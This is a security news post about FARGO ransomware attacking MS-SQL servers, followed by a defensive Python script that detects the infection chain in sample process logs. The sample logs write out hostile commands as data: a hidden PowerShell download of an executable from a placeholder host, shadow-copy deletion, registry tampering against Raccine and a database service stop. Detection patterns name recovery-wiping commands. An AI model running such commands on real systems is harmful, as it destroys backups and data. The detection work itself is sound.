October 4, 2022 - TuxCare expert team
Microsoft SQL servers are being targeted with FARGO ransomware, according to researchers at the AhnLab Security Emergency Response Center (ASEC).
MS-SQL servers are database management systems that store data for internet services and applications, which makes them a high-value target for extortion.
FARGO is one of the most prominent ransomware families that, alongside GlobeImposter, concentrates on MS-SQL servers. It was previously known as "Mallox" because it appended the ".mallox" extension to encrypted files.
Analysing the infection and execution chain, the researchers found that it begins with the MS-SQL process on the compromised host, which downloads a .NET file via cmd.exe and powershell.exe. That payload then fetches additional malware, including the locker, and generates and executes a BAT file that terminates specific processes and services.
The ransomware payload then injects itself into AppLaunch.exe, a legitimate Windows process. It attempts to delete the registry key belonging to the open source ransomware "vaccine" Raccine, runs the recovery deactivation command, and terminates database-related processes so that their files are no longer locked and can be encrypted.
FARGO excludes some software and directories from encryption so that the compromised system does not become completely unusable. The exclusions include several Microsoft Windows system directories, the boot files, Tor Browser, Internet Explorer, user customizations and settings, the debug log file and the thumbnail database.
Once encryption is complete, the locked files are renamed with the ".Fargo3" extension and the malware drops the ransom note ("RECOVERY FILES.txt").
MS-SQL server administrators should therefore make sure their systems are protected with strong, unique passwords, since brute-force and dictionary attacks against weakly secured accounts are the typical entry point in these campaigns, limit the network exposure of the SQL listener, and keep the servers up to date by installing the latest fixes for security vulnerabilities.
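The chain described above gives defenders several process-level tells: the SQL Server service spawning a shell, the recovery deactivation command, registry tampering against Raccine, database processes being killed, and AppLaunch.exe appearing under an unexpected parent. The following Python script is an added example, not code from the TuxCare post or from ASEC, that runs simple detection rules over constructed process-creation records modelled on Sysmon Event ID 1. The record fields, the exact recovery-deactivation commands, and the assumption that Raccine registers itself under Image File Execution Options are assumptions made for illustration.

```python
"""Hunt the FARGO/Mallox execution chain in process-creation telemetry.

Added example (not from the TuxCare post or the ASEC report). Records are a
constructed, simplified Sysmon Event ID 1 shape; field names are assumptions.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional, Tuple

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str        # command line of the created process

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DB_PROCESSES = {"sqlservr.exe", "sqlagent.exe", "sqlwriter.exe", "mysqld.exe", "oracle.exe"}

# The post only says "the recovery deactivation command"; these concrete forms are
# assumptions taken from common ransomware tradecraft.
RECOVERY_KILL = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows"
    r"|wmic(\.exe)?\s+shadowcopy\s+delete"
    r"|bcdedit(\.exe)?\s+.*recoveryenabled\s+no"
    r"|wbadmin(\.exe)?\s+delete\s+catalog",
    re.IGNORECASE,
)
# Assumption: Raccine installs itself as an IFEO debugger for vssadmin.exe and
# similar tools, so deleting those keys (or anything named Raccine) disables it.
RACCINE_TAMPER = re.compile(
    r"reg(\.exe)?\s+delete\s+.*(image file execution options|raccine)", re.IGNORECASE)
# Process/service termination as done by the BAT file and the locker itself.
KILL_CMD = re.compile(
    r"taskkill(?:\.exe)?\s+.*?/im\s+(\S+)|net(?:\.exe)?\s+stop\s+(\S+)", re.IGNORECASE)

def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()

def rule_sql_spawns_shell(ev: ProcEvent) -> Optional[str]:
    if base(ev.parent_image) == "sqlservr.exe" and base(ev.image) in SHELLS:
        return "sqlservr.exe spawned a shell (first stage of the chain)"
    return None

def rule_recovery_deactivation(ev: ProcEvent) -> Optional[str]:
    if RECOVERY_KILL.search(ev.cmdline):
        return "recovery/shadow-copy deactivation command"
    return None

def rule_raccine_tamper(ev: ProcEvent) -> Optional[str]:
    if RACCINE_TAMPER.search(ev.cmdline):
        return "registry deletion aimed at Raccine IFEO entries"
    return None

def rule_db_process_kill(ev: ProcEvent) -> Optional[str]:
    m = KILL_CMD.search(ev.cmdline)
    if m:
        target = (m.group(1) or m.group(2) or "").strip('"').lower()
        if target in DB_PROCESSES or target.startswith("mssql"):
            return f"termination of database process/service {target}"
    return None

def rule_applaunch_odd_parent(ev: ProcEvent) -> Optional[str]:
    # Heuristic: AppLaunch.exe is normally started by .NET installers living under
    # C:\Windows; a parent elsewhere is a candidate injection host.
    if base(ev.image) == "applaunch.exe" and not ev.parent_image.lower().startswith("c:\\windows\\"):
        return "AppLaunch.exe started by a non-Windows parent (injection host heuristic)"
    return None

RULES: List[Callable[[ProcEvent], Optional[str]]] = [
    rule_sql_spawns_shell, rule_recovery_deactivation, rule_raccine_tamper,
    rule_db_process_kill, rule_applaunch_odd_parent,
]

def detect(events: Iterable[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule name, reason) for every rule that fires on any event."""
    hits = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                hits.append((ev.pid, rule.__name__, reason))
    return hits

def verdict(hits: List[Tuple[int, str, str]], threshold: int = 2) -> Tuple[str, List[str]]:
    """Escalate only when several distinct stages are seen on one host."""
    distinct = sorted({name for _, name, _ in hits})
    label = "likely FARGO/Mallox-style chain" if len(distinct) >= threshold else "no verdict"
    return label, distinct

# Constructed sample telemetry from one host (not real logs); paths/URLs are placeholders.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE = [
    ProcEvent(4120, r"C:\Windows\System32\cmd.exe", SQLSERVR,
              r'cmd.exe /c powershell -nop -w hidden -c "Invoke-WebRequest http://example.invalid/stage.exe -OutFile C:\Users\Public\stage.exe"'),
    ProcEvent(4188, r"C:\Windows\System32\reg.exe", r"C:\Users\Public\stage.exe",
              r'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe" /f'),
    ProcEvent(4200, r"C:\Windows\System32\vssadmin.exe", r"C:\Windows\System32\cmd.exe",
              "vssadmin delete shadows /all /quiet"),
    ProcEvent(4212, r"C:\Windows\System32\net.exe", r"C:\Windows\System32\cmd.exe",
              "net stop MSSQLSERVER /y"),
    ProcEvent(4230, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe",
              r"C:\Users\Public\stage.exe", "AppLaunch.exe"),
    ProcEvent(5001, r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    found = detect(SAMPLE)
    for pid, name, reason in found:
        print(f"pid {pid}: {name}: {reason}")
    print(verdict(found))
```

The point of the threshold in verdict() is that each rule on its own is noisy (administrators do run net stop MSSQLSERVER and occasionally delete shadow copies); the chain becomes convincing only when several stages, above all sqlservr.exe spawning a shell, are seen together on one host in a short window.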
The sources for this piece include an article in BleepingComputer.